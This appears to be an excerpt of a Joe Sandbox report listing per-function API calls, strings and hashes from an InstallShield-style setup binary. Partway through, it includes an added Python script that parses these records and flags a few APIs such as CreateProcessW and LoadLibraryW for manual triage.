• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeLastString
• String ID: HsG
• API String ID: 3822639702-1835203436
• Opcode ID: 28d39bb818197e2999583928289702a82eb8be35f25ce6e9140f6755c8fc59c1
• Instruction ID: e6d77d7b499982b3e090db9fe78de37c08dca1200a250ee095ae04ed91534034
• Opcode Fuzzy Hash: 28d39bb818197e2999583928289702a82eb8be35f25ce6e9140f6755c8fc59c1
• Instruction Fuzzy Hash: D1418A71600209ABCF14EF64C944B9A77E4FF44718F51823AFD19AB2D1DB38E908CB98
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00455C91
  • Part of subcall function 0040F638: __EH_prolog3_GS.LIBCMT ref: 0040F63F
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• GetLastError.KERNEL32 ref: 00455D85
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeH_prolog3_String
• String ID: HsG$HsG$\
• API String ID: 2608676048-1273255123
• Opcode ID: 94251298066fbc9f332dcbf7bbd72bc663a0c9f12fad28b9406aa35f7a5999b3
• Instruction ID: 1a2281ef391b02badb8f6c6782d21d1b03687c718303ea41c398b00632531fae
• Opcode Fuzzy Hash: 94251298066fbc9f332dcbf7bbd72bc663a0c9f12fad28b9406aa35f7a5999b3
• Instruction Fuzzy Hash: A8417D72804518DADB10EBF4C8969ED7B78BB10348F10412FEC0AA7293EB78594ECB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0042D35E
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 004114B9: __EH_prolog3_GS.LIBCMT ref: 004114C0
  • Part of subcall function 00421862: __EH_prolog3_GS.LIBCMT ref: 00421869
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString
• String ID: /n %s$:InstanceId%d.mst$HsG$MSINEWINSTANCE=1
• API String ID: 1274762985-2962780309
• Opcode ID: cab9408cfb248484796564eec9fc3dec05d0467fc54a22b521ea4ec8279715a9
• Instruction ID: 6954da7d79d95b13c51607618fe600fb7f749aa8aa99bc3f5a9ff1ca1cc696f8
• Opcode Fuzzy Hash: cab9408cfb248484796564eec9fc3dec05d0467fc54a22b521ea4ec8279715a9
• Instruction Fuzzy Hash: 1A413071D04259EACF14EFE5CC91ADDBBB4BF14308F50406FE505A7181EB786A09CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00425D29
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00425C00: __EH_prolog3_GS.LIBCMT ref: 00425C07
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000400,?,00000400,?,?,00000000,00000000,ISSetup.dll,?,00000001,000000A8,00427A65,?), ref: 00425DC5
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 0040C5CB: __EH_prolog3_GS.LIBCMT ref: 0040C5D2
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last$String$FreeH_prolog3$AllocFileModuleName
• String ID: HsG$ISSetup.dll$ISSetup.dll
• API String ID: 3766261395-2501284907
• Opcode ID: 6fc6fd731e8ece0c01dca442491238d42ded462abafe611b5ec31ad11b805681
• Instruction ID: 063de67b3e9ff9d0e20237d2c9be6243cc9a0dd31fc63a947a6a1707d6168d19
• Opcode Fuzzy Hash: 6fc6fd731e8ece0c01dca442491238d42ded462abafe611b5ec31ad11b805681
• Instruction Fuzzy Hash: 9C419F71900218EEDB11EBA1CC91BEEBB78AF11304F5041AEE542B71D2EB781F09DB59
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044F708
                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 0044F736
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000), ref: 0044F764
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000), ref: 0044F79A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3058430110-1835203436
                                                                                                                                                                          • Opcode ID: 45b496ab056d8f72f473a5ee93b9cde7b70d1e038dbc3add78416efc571e6e94
                                                                                                                                                                          • Instruction ID: d2a8dc96114b7d7f4a822cbd08c7d89235cd03a0836e6effe8c14ca43e753225
                                                                                                                                                                          • Opcode Fuzzy Hash: 45b496ab056d8f72f473a5ee93b9cde7b70d1e038dbc3add78416efc571e6e94
                                                                                                                                                                          • Instruction Fuzzy Hash: F131F331600206AFEB21CF75C844BBB7BA9FF41354F26453AE854872A1D338E899DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystem_memset_strstr
                                                                                                                                                                          • String ID: api-ms-win-core-
                                                                                                                                                                          • API String ID: 3657221724-1285793476
                                                                                                                                                                          • Opcode ID: f7126195dca1943588a6c8bac4722d8a4f94509b7cf031c496fe2229c321e5fd
                                                                                                                                                                          • Instruction ID: 83d3fd9e628b2f8d8865071b1e2d6f9067f9adf47cde43992171fd4f4b02c3d1
                                                                                                                                                                          • Opcode Fuzzy Hash: f7126195dca1943588a6c8bac4722d8a4f94509b7cf031c496fe2229c321e5fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A2127718047049EEB20DB249C84BEA7BE4DB15308F1448BBD4D6B32C1D7B9A9C4CB9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00404DB2
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,?,74B04D40,?,?,?,00471858,000000FF,HsG,00403E24), ref: 00404DDD
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404E2E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-815662401
                                                                                                                                                                          • Opcode ID: f9183055fa258d70398033bd1dd18630fbf538d8dfc564c67f5463bca482adfc
                                                                                                                                                                          • Instruction ID: 9d582c57c52179a9b23215cd3e6947e4845b0f03d18dae1ad6fca86d42b0d534
                                                                                                                                                                          • Opcode Fuzzy Hash: f9183055fa258d70398033bd1dd18630fbf538d8dfc564c67f5463bca482adfc
                                                                                                                                                                          • Instruction Fuzzy Hash: D331BFB1100A01EFD710DF45C984BA6B7F8FF48718F50422EE91997A90DB79F909CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00456D5D
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040C487: __EH_prolog3.LIBCMT ref: 0040C48E
                                                                                                                                                                            • Part of subcall function 0040C487: GetLastError.KERNEL32(00000004,0040C71D,00000000,?,00000000,00000004,0040F729,-00000004,?,00000001,?,00000000), ref: 0040C4B0
                                                                                                                                                                            • Part of subcall function 0040C487: SetLastError.KERNEL32(?,00000000,?), ref: 0040C4F1
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$H_prolog3$FreeH_prolog3_$Alloc
                                                                                                                                                                          • String ID: HsG$HsG$HsG$InstalledProductName
                                                                                                                                                                          • API String ID: 808671728-2315314420
                                                                                                                                                                          • Opcode ID: bdcd2d0ba47a381cb16d49d4d3ef5eb5dd1ecb3ed228236aab87a7235c38d0af
                                                                                                                                                                          • Instruction ID: 6c50d195f9c365d330c8cd9bfad8d36924ca448d016042700607c1f278bda57a
                                                                                                                                                                          • Opcode Fuzzy Hash: bdcd2d0ba47a381cb16d49d4d3ef5eb5dd1ecb3ed228236aab87a7235c38d0af
                                                                                                                                                                          • Instruction Fuzzy Hash: BE319270904208DFDB10DFE5C891AEDBBB4BF54308F60802EE805B7182DB785A4DCB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
• __EH_prolog3_GS.LIBCMT ref: 00458C99
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
  • Part of subcall function 0040C487: __EH_prolog3.LIBCMT ref: 0040C48E
  • Part of subcall function 0040C487: GetLastError.KERNEL32(00000004,0040C71D,00000000,?,00000000,00000004,0040F729,-00000004,?,00000001,?,00000000), ref: 0040C4B0
  • Part of subcall function 0040C487: SetLastError.KERNEL32(?,00000000,?), ref: 0040C4F1
  • Part of subcall function 0040C5CB: __EH_prolog3_GS.LIBCMT ref: 0040C5D2
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 00457A89: __EH_prolog3_GS.LIBCMT ref: 00457A93
  • Part of subcall function 00457A89: _memset.LIBCMT ref: 00457B2C
  • Part of subcall function 00457A89: CreateProcessW.KERNEL32 ref: 00457BA4
  • Part of subcall function 00457A89: GetLastError.KERNEL32 ref: 00457BBF
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3$H_prolog3_$FreeString$CreateProcess_memset
• String ID: /REGSERVER$ /UNREGSERVER$HsG$open
• API String ID: 2413291776-1596474003
• Opcode ID: 64102b978f8c3d9065bdee9227943088cd9aad66e8fc8769ddd133c53bac298d
• Instruction ID: 1ca64e020523cb4cf8eab23e085ca272878be5ba3c50ec1c1128e6bfff3626c9
• Opcode Fuzzy Hash: 64102b978f8c3d9065bdee9227943088cd9aad66e8fc8769ddd133c53bac298d
• Instruction Fuzzy Hash: CD21D671E10304EAEB00EBA5C8537ED7BA89F50704F50405EFD04AB2C2D7B94A0987DA
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _memmove
• String ID: :G@$:G@$HsG
• API String ID: 4104443479-2235847568
• Opcode ID: 5ff5acbeeac4805a8dd3ed3af7a127052f109d35fa0132a9f2fa85b24df8afe1
• Instruction ID: a4e55f3b04ec15174be7f10891f4c303da10bb07fe7f3a4f5d4f1495e19c2a84
• Opcode Fuzzy Hash: 5ff5acbeeac4805a8dd3ed3af7a127052f109d35fa0132a9f2fa85b24df8afe1
• Instruction Fuzzy Hash: 6311B1B76016119BD7209E09F880967F3A4FBA1365720453BE9949B300D336AC95CBF8
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00418DBE
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
• LoadLibraryW.KERNEL32(?,?,00000001,0000006C,00427B39,?,00000000,?,00000000), ref: 00418DE7
• GetLastError.KERNEL32 ref: 00418DFE
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3H_prolog3_LastLibraryLoad
• String ID: Failed to load ISSetup.dll$IsMsiHelper.cpp
• API String ID: 1370564055-251664514
• Opcode ID: b507f8d3578ff315ec5e21c74f6649b32ff260a49ed6a8e085fe0137660c105d
• Instruction ID: 29ca2e7c09aacabe980d5a505d9c2b201bbef07a08d2fed9459ba583d544a0c0
• Opcode Fuzzy Hash: b507f8d3578ff315ec5e21c74f6649b32ff260a49ed6a8e085fe0137660c105d
• Instruction Fuzzy Hash: 3921AE70904244EFDB14EBA4CD49BDE7BB4BB11304F54006EF401A72D2DBB95A88CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004547AF
• __CxxThrowException@8.LIBCMT ref: 00454825
• ReadFile.KERNEL32(?,?,?,?,00000000,0000010C,004588DC,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00454837
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3Last$Exception@8FileH_prolog3_ReadThrow
• String ID: HsG$HsG
• API String ID: 2465803405-815662401
• Opcode ID: 13a1e467b967cb21f1c486671ebf6ba3d1f59f205f2c1b932172821062709fa5
• Instruction ID: 8da10ccdbc95e4ee78ae6e59552e5795d8a60701dd4cb6faeb61a82ca62d743d
• Opcode Fuzzy Hash: 13a1e467b967cb21f1c486671ebf6ba3d1f59f205f2c1b932172821062709fa5
• Instruction Fuzzy Hash: 782130B5900218DBDB24EFA5CC91EEEB7B8BF44704F10816FF905A7141DB749A49CB54
Uniqueness
Uniqueness Score: -1.00%
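Reading records like the ones above one by one does not scale to a full report, so here is an added example (not part of this report, and not Joe Sandbox code) that parses the APIs / String ID / Uniqueness blocks into structured records and lists every watched API call, direct or reached through a subcall, next to the strings of the same function. Everything beyond the record format is my own assumption: the watch list, the 0x400000 to 0x500000 image range (taken from the dump offsets on this page, whose highest associated region starts at 0x4E5000), and the heuristic that drops tokens such as "HsG", whose bytes 48 73 47 read little-endian as the in-image address 0x00477348 and so are almost certainly a pointer the string scanner picked up as text. The sample text is constructed in the shape of the records on this page.

```python
"""Parse Joe Sandbox per-function records (the repeated APIs / Strings /
Similarity / Uniqueness blocks) and flag API + string pairings worth a manual
look.  Added example, not Joe Sandbox code; rules and heuristics are my own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

API_RE = re.compile(r"^•\s*([\w@]+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})")
SUBCALL_RE = re.compile(r"^•\s*Part of subcall function ([0-9A-Fa-f]{8}):\s*"
                        r"([\w@]+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})")
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
# Assumed image range: dumps are based at 0x400000 and the highest associated
# region on the page starts at 0x4E5000.
IMAGE_LO, IMAGE_HI = 0x400000, 0x500000
# Hypothetical triage rules: API name -> why a reviewer should look at it.
WATCH_APIS = {
    "CreateProcessW": "spawns a child process (check the command line)",
    "LoadLibraryW": "loads a DLL chosen at run time (possible side-loading)",
    "ReadFile": "reads file content",
}
# Constructed sample in the shape of the report records above.
SAMPLE = """\
APIs
• __EH_prolog3_GS.LIBCMT ref: 00458C99
  • Part of subcall function 00457A89: CreateProcessW.KERNEL32 ref: 00457BA4
Strings
Similarity
• String ID: /REGSERVER$ /UNREGSERVER$HsG$open
• Opcode ID: 64102b978f8c3d9065bdee9227943088cd9aad66e8fc8769ddd133c53bac298d
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(?,?,00000001,0000006C,00427B39,?,00000000,?,00000000), ref: 00418DE7
• GetLastError.KERNEL32 ref: 00418DFE
Similarity
• String ID: Failed to load ISSetup.dll$IsMsiHelper.cpp

APIs
• lstrcatW.KERNEL32(?,.ini), ref: 00440103
Similarity
• String ID: %#04x$.ini
"""

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                    # call-site address from "ref:"
    via: Optional[str] = None   # subcall function address when indirect

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)   # raw "String ID" parts
    fields: dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None

def parse_records(text: str) -> list[FunctionRecord]:
    """A record starts at an 'APIs' header and runs to the next one."""
    records: list[FunctionRecord] = []
    rec: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
        elif rec is None or not line:
            continue
        elif line.startswith("Uniqueness Score:"):
            rec.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif (m := SUBCALL_RE.match(line)):
            rec.apis.append(ApiCall(m[2], m[3], m[5], via=m[1]))
        elif (m := API_RE.match(line)):
            rec.apis.append(ApiCall(m[1], m[2], m[4]))
        elif (m := FIELD_RE.match(line)) and m[1] == "String ID":
            rec.strings = m[2].split("$")     # the report joins strings with '$'
        elif m:
            rec.fields[m[1]] = m[2]           # Opcode ID, Source File, ...
    return records

def looks_like_pointer(s: str) -> bool:
    """3-4 printable bytes that read little-endian as an in-image address are
    almost certainly a pointer mistaken for text ('HsG' -> 0x00477348)."""
    if not 3 <= len(s) <= 4 or not s.isascii():
        return False
    value = int.from_bytes(s.encode("ascii").ljust(4, b"\0"), "little")
    return IMAGE_LO <= value < IMAGE_HI

def real_strings(rec: FunctionRecord) -> list[str]:
    return [s for s in rec.strings if s and not looks_like_pointer(s)]

def triage(records: list[FunctionRecord]) -> list[dict]:
    """Every watched API (direct or via a subcall) beside the record's real
    strings, so the likely arguments sit next to the call site."""
    return [{"api": c.name, "ref": c.ref, "via": c.via, "reason": WATCH_APIS[c.name],
             "strings": real_strings(rec)}
            for rec in records for c in rec.apis if c.name in WATCH_APIS]
```

Run `triage(parse_records(text))` over a saved text export of the report. A record whose only strings are pointer-shaped tokens, like the `HsG$HsG` record above, comes back with an empty string list, which is itself useful: that function carries no literal data, and its behaviour has to be read from the API sequence alone.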

APIs
• wsprintfW.USER32 ref: 004400D1
  • Part of subcall function 0043F9EA: lstrcpyW.KERNEL32 ref: 0043FA2E
  • Part of subcall function 0043F9EA: _wcsrchr.LIBCMT ref: 0043FA39
  • Part of subcall function 0043F9EA: CharNextW.USER32(00000000), ref: 0043FA47
  • Part of subcall function 0043F9EA: lstrcpyW.KERNEL32 ref: 0043FA65
  • Part of subcall function 0043F9EA: lstrcpyW.KERNEL32 ref: 0043FA6E
  • Part of subcall function 0043F694: lstrlenW.KERNEL32(?,?,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 0043F69C
  • Part of subcall function 0043F694: lstrcpynW.KERNEL32(?,?,-00000001,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8), ref: 0043F6C0
